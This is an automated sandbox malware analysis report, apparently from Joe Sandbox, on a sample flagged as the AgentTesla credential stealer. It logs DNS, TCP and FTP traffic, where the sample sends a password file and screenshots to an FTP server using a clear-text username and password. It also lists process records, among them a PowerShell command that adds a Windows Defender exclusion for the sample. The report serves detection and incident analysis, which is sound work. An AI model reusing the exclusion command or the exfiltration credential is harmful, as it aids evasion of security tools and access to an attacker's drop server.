Oct 9, 2024 15:53:16.188150883 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.188193083 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.188235998 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.188270092 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.188306093 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.188313961 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.188359976 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.188369989 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.188405037 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.188461065 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.188477039 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.188527107 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.188530922 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.188688993 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.188889027 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.193420887 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.193593025 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.193766117 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.193775892 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.194216013 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.194269896 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.219584942 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.831758976 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.855071068 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.855235100 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:39.426990032 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:39.432425976 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:39.651563883 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:39.653804064 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:39.659717083 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:39.661536932 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:39.661722898 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:39.666590929 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:40.338219881 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:40.391428947 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.043284893 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.048388958 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.048405886 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.048422098 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.048434019 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.048458099 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.048476934 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.048537016 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.048537970 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.048549891 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.048562050 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.048578024 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.048623085 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.048680067 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.048799992 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.048940897 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.054841995 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.054857016 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.054912090 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.054936886 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.054960966 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.054974079 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.054986954 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.054996967 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.055035114 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.055092096 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.055104017 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.055193901 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:41.055212021 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.055416107 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.059911966 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.060075998 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.060162067 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.060174942 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.060292006 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.060697079 CEST	63516	49974	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:41.060842037 CEST	49974	63516	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:42.167511940 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:42.167532921 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:42.167568922 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:42.167608023 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:42.167623043 CEST	49733	21	192.168.2.4	104.247.165.99

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 9, 2024 15:51:41.061037064 CEST	63767	53	192.168.2.4	1.1.1.1
Oct 9, 2024 15:51:41.134665966 CEST	53	63767	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 9, 2024 15:51:41.061037064 CEST	192.168.2.4	1.1.1.1	0x79c4	Standard query (0)	ftp.normagroup.com.tr	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 9, 2024 15:51:41.134665966 CEST	1.1.1.1	192.168.2.4	0x79c4	No error (0)	ftp.normagroup.com.tr		104.247.165.99	A (IP address)	IN (0x0001)	false

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 9, 2024 15:51:42.985353947 CEST	21	49733	104.247.165.99	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 16:51. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 16:51. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 16:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 16:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Oct 9, 2024 15:51:43.014903069 CEST	49733	21	192.168.2.4	104.247.165.99	USER admin@normagroup.com.tr
Oct 9, 2024 15:51:43.251539946 CEST	21	49733	104.247.165.99	192.168.2.4	331 User admin@normagroup.com.tr OK. Password required
Oct 9, 2024 15:51:43.251683950 CEST	49733	21	192.168.2.4	104.247.165.99	PASS Qb.X[.j.Yfm[
Oct 9, 2024 15:51:43.924839020 CEST	21	49733	104.247.165.99	192.168.2.4	230 OK. Current restricted directory is /
Oct 9, 2024 15:51:43.925925970 CEST	21	49733	104.247.165.99	192.168.2.4	230 OK. Current restricted directory is /
Oct 9, 2024 15:51:44.150084972 CEST	21	49733	104.247.165.99	192.168.2.4	504 Unknown command
Oct 9, 2024 15:51:44.150286913 CEST	49733	21	192.168.2.4	104.247.165.99	PWD
Oct 9, 2024 15:51:44.383707047 CEST	21	49733	104.247.165.99	192.168.2.4	257 "/" is your current location
Oct 9, 2024 15:51:44.383884907 CEST	49733	21	192.168.2.4	104.247.165.99	TYPE I
Oct 9, 2024 15:51:44.614674091 CEST	21	49733	104.247.165.99	192.168.2.4	200 TYPE is now 8-bit binary
Oct 9, 2024 15:51:44.615011930 CEST	49733	21	192.168.2.4	104.247.165.99	PASV
Oct 9, 2024 15:51:44.852447033 CEST	21	49733	104.247.165.99	192.168.2.4	227 Entering Passive Mode (104,247,165,99,216,166)
Oct 9, 2024 15:51:44.858745098 CEST	49733	21	192.168.2.4	104.247.165.99	STOR PW_user-927537_2024_10_09_09_51_39.html
Oct 9, 2024 15:51:45.488126040 CEST	21	49733	104.247.165.99	192.168.2.4	150 Accepted data connection
Oct 9, 2024 15:51:45.716684103 CEST	21	49733	104.247.165.99	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.228 seconds (measured here), 1.36 Kbytes per second
Oct 9, 2024 15:53:15.328044891 CEST	49733	21	192.168.2.4	104.247.165.99	PASV
Oct 9, 2024 15:53:15.555639029 CEST	21	49733	104.247.165.99	192.168.2.4	227 Entering Passive Mode (104,247,165,99,208,44)
Oct 9, 2024 15:53:15.561635017 CEST	49733	21	192.168.2.4	104.247.165.99	STOR SC_user-927537_2024_11_06_03_44_10.jpeg
Oct 9, 2024 15:53:16.177823067 CEST	21	49733	104.247.165.99	192.168.2.4	150 Accepted data connection
Oct 9, 2024 15:53:16.831758976 CEST	21	49733	104.247.165.99	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.470 seconds (measured here), 117.75 Kbytes per second
Oct 9, 2024 15:53:16.855071068 CEST	21	49733	104.247.165.99	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.470 seconds (measured here), 117.75 Kbytes per second
Oct 9, 2024 15:53:39.426990032 CEST	49733	21	192.168.2.4	104.247.165.99	PASV
Oct 9, 2024 15:53:39.651563883 CEST	21	49733	104.247.165.99	192.168.2.4	227 Entering Passive Mode (104,247,165,99,248,28)
Oct 9, 2024 15:53:39.661722898 CEST	49733	21	192.168.2.4	104.247.165.99	STOR SC_user-927537_2024_11_18_20_42_26.jpeg
Oct 9, 2024 15:53:40.338219881 CEST	21	49733	104.247.165.99	192.168.2.4	150 Accepted data connection
Oct 9, 2024 15:53:42.167511940 CEST	21	49733	104.247.165.99	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 1.229 seconds (measured here), 45.08 Kbytes per second
Oct 9, 2024 15:53:42.167532921 CEST	21	49733	104.247.165.99	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 1.229 seconds (measured here), 45.08 Kbytes per second
Oct 9, 2024 15:53:42.167568922 CEST	21	49733	104.247.165.99	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 1.229 seconds (measured here), 45.08 Kbytes per second

Target ID:	0
Start time:	09:51:34
Start date:	09/10/2024
Path:	C:\Users\user\Desktop\wKmhzHd4MC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\wKmhzHd4MC.exe"
Imagebase:	0x850000
File size:	843'264 bytes
MD5 hash:	38C9E1CF0E8F09BB1DB22C49A68FC9B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:51:37
Start date:	09/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe"
Imagebase:	0x3f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:51:37
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:51:37
Start date:	09/10/2024
Path:	C:\Users\user\Desktop\wKmhzHd4MC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\wKmhzHd4MC.exe"
Imagebase:	0x740000
File size:	843'264 bytes
MD5 hash:	38C9E1CF0E8F09BB1DB22C49A68FC9B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2966477263.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2966477263.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2968931469.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2968931469.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2968931469.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	09:51:40
Start date:	09/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	38
Total number of Limit Nodes:	3

Executed Functions

Function 011AD051 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 011AD0DE
GetCurrentThread.KERNEL32 ref: 011AD11B
GetCurrentProcess.KERNEL32 ref: 011AD158
GetCurrentThreadId.KERNEL32 ref: 011AD1B1

Memory Dump Source

Source File: 00000000.00000002.1756971373.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11a0000_wKmhzHd4MC.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 387643e0fd2d4097d92e268bb0c922c3b044183a75a427bb960f95c901212255
Instruction ID: 1b695cdf8131ccbe30e1255b4cee90a2ec4f9cc3519c0db57856c472e415c58c
Opcode Fuzzy Hash: 387643e0fd2d4097d92e268bb0c922c3b044183a75a427bb960f95c901212255
Instruction Fuzzy Hash: E45175B49006498FDB18DFA9D588BDEBFF5AF48318F20C459E118A7360DB34A984CF65

Function 011AD060 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 011AD0DE
GetCurrentThread.KERNEL32 ref: 011AD11B
GetCurrentProcess.KERNEL32 ref: 011AD158
GetCurrentThreadId.KERNEL32 ref: 011AD1B1

Memory Dump Source

Source File: 00000000.00000002.1756971373.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11a0000_wKmhzHd4MC.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: fccdb9291baa266ef63a12e5802ef5791af43685f348df2e5d4c1038c1e92e68
Instruction ID: 621443b2c41ea0d0745425f59a505401cc2e7ec1c9283898f1ce214bf052dbb4
Opcode Fuzzy Hash: fccdb9291baa266ef63a12e5802ef5791af43685f348df2e5d4c1038c1e92e68
Instruction Fuzzy Hash: EE5155B49006098FDB18DFA9D588BDEBFF5AF48318F20C459E119A7360DB34A984CF65

Function 011AADC8 Relevance: 1.7, APIs: 1, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 011AB01E

Memory Dump Source

Source File: 00000000.00000002.1756971373.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11a0000_wKmhzHd4MC.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e239adecb2b2f592b5005c830cf55f8baab0a1a991f00354e000959b0004838a
Instruction ID: a7ff7cf33fde00e645d0aef568a2ab024039544ab6375bfc3ba879d3e2c119f9
Opcode Fuzzy Hash: e239adecb2b2f592b5005c830cf55f8baab0a1a991f00354e000959b0004838a
Instruction Fuzzy Hash: FD818A74A00B458FD728DF29E15479ABBF5FF88304F008A2DD186DBA50D775E84ACB91

Function 011A590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011A59C9

Memory Dump Source

Source File: 00000000.00000002.1756971373.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11a0000_wKmhzHd4MC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6ca221d38154898a37e536f4c2d5a36fe97b9c443f8228308fa5b0a899c0d628
Instruction ID: 4150e014e6840f0689f3541dac02aa1508e1de73000df8361ca396a29823cfbe
Opcode Fuzzy Hash: 6ca221d38154898a37e536f4c2d5a36fe97b9c443f8228308fa5b0a899c0d628
Instruction Fuzzy Hash: E041E3B4C00719CFDB24DFA9C8847DDBBB6BF49308F64805AD408AB255DB755986CF90

Function 011A44B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011A59C9

Memory Dump Source

Source File: 00000000.00000002.1756971373.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11a0000_wKmhzHd4MC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3adcef431e0e59d63486be34c615855d895c8bdf01de00ef43fff3f911ad7ffd
Instruction ID: fd12a9256a295c19c3d2ff5555894dfa83696781fa18cbfeb12bfa31c855e2eb
Opcode Fuzzy Hash: 3adcef431e0e59d63486be34c615855d895c8bdf01de00ef43fff3f911ad7ffd
Instruction Fuzzy Hash: B04102B4C00719CBDB28CFA9C8847CDBBB6BF49304F64805AD408AB255EB755985CF90

Function 011AD6A9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011AD737

Memory Dump Source

Source File: 00000000.00000002.1756971373.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11a0000_wKmhzHd4MC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d8929af2fe1e07e15516a16cd05169efc8c84eea514fed4fd1dd9979d56ac1db
Instruction ID: cc965991c3122cd64a8033e9ff5dc1a42e0064b12ba347199ae6b5f1cecd44d8
Opcode Fuzzy Hash: d8929af2fe1e07e15516a16cd05169efc8c84eea514fed4fd1dd9979d56ac1db
Instruction Fuzzy Hash: B02103B59002589FDB10CF9AD584ADEBFF8EB48324F54801AE954B3310D374A940CFA0

Function 011AD6B0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011AD737

Memory Dump Source

Source File: 00000000.00000002.1756971373.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11a0000_wKmhzHd4MC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 634eec661132affccc21d6a295e63096754788a91c799e63b65c9283cec1ccdf
Instruction ID: bd3e819bfe4bb8c97de9977c61bbf75919cee16d0e209173ded502d4977a0598
Opcode Fuzzy Hash: 634eec661132affccc21d6a295e63096754788a91c799e63b65c9283cec1ccdf
Instruction Fuzzy Hash: B921E4B5900258DFDB10CF9AD584ADEFFF8EB48320F54801AE954A7350C374A940CFA4

Function 011AAFB8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 011AB01E

Memory Dump Source

Source File: 00000000.00000002.1756971373.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11a0000_wKmhzHd4MC.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2c5a1bf4138760d2b588ee3f4cb22b6c087c9ff930ddb5b61409d35845e828b3
Instruction ID: 3594110a1498e5d297d3a4f6df35c3567c6a8b55ccbff9a5d324b5ac7731d226
Opcode Fuzzy Hash: 2c5a1bf4138760d2b588ee3f4cb22b6c087c9ff930ddb5b61409d35845e828b3
Instruction Fuzzy Hash: 311110B5C003898FDB24DF9AC544BDEFBF4AB88324F10842AD529B7210D379A545CFA5

Function 010FD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756610676.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10fd000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a035faeb882dca7e6b8d1641d433268a71c3cdb4fbd28ce0b1513fb71dfc402
Instruction ID: 472b30bc517c7d3db94899f0c1641b1d99b424948727f09fabf1059570b8a3c1
Opcode Fuzzy Hash: 4a035faeb882dca7e6b8d1641d433268a71c3cdb4fbd28ce0b1513fb71dfc402
Instruction Fuzzy Hash: 84216771500200DFCB01DF58D9C5B2BBFA5FB88718F20C1ADEA890B656C336D446CBA2

Function 010FD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756610676.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10fd000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d3c1fd748fde3a3af5e9be9d4c4c7462d6f7ab2843c16ae951b08cbee16a23
Instruction ID: 03be0ded0387e6b822411021113c2bcf246006fbc4b655b5f55bf1134279068a
Opcode Fuzzy Hash: 95d3c1fd748fde3a3af5e9be9d4c4c7462d6f7ab2843c16ae951b08cbee16a23
Instruction Fuzzy Hash: 69214571500200DFDB05DF48C9C1B6ABFA5FB88324F20C1ADEA490B656C73AF446CBA2

Function 0110D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756681577.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_110d000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8166c9ebcb910cb14e456450cb7f11ac72cc0b8472e53d0a69eb8a67b697d69f
Instruction ID: abd9d49d8e5805bff1768410835ecc62d0c0dfb0298cbe0e6d0fd8a12fb21741
Opcode Fuzzy Hash: 8166c9ebcb910cb14e456450cb7f11ac72cc0b8472e53d0a69eb8a67b697d69f
Instruction Fuzzy Hash: 16210771904200EFDF0ADFD8E5C0B26BBA5FB84324F20C56DE9094B296C3B6D446CA62

Function 0110D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756681577.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_110d000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e811ce295bcb8d2b722e68a7314a9ee869bd46decf940cce95c10a419e6df67a
Instruction ID: b142646f38e0030bd8da7f3f18f508189ff25e4107d944b674c4554ff6484213
Opcode Fuzzy Hash: e811ce295bcb8d2b722e68a7314a9ee869bd46decf940cce95c10a419e6df67a
Instruction Fuzzy Hash: 2B212571A04200DFDF1ADF98E984B16BF65EB84314F20C56DD80D4B29AC3B6D447CA62

Function 010FD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756610676.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10fd000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 41e505e098fe888ad483ac2aeec44d0c762fc692a8187b68c9af13ed6faed6df
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 6511DF72404240CFDB02CF44D5C4B56BFB1FB94324F24C2ADD9490B656C33AE45ACBA2

Function 010FD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756610676.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10fd000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: c1e68bd59118cc0103c14575ee7f8f19cf6584868ddacebd0b1a8993ed74b287
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: E311E172404280CFCB02CF54D5C4B16BFB1FB84718F24C6ADD9490B656C33AD45ACBA2

Function 0110D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756681577.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_110d000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
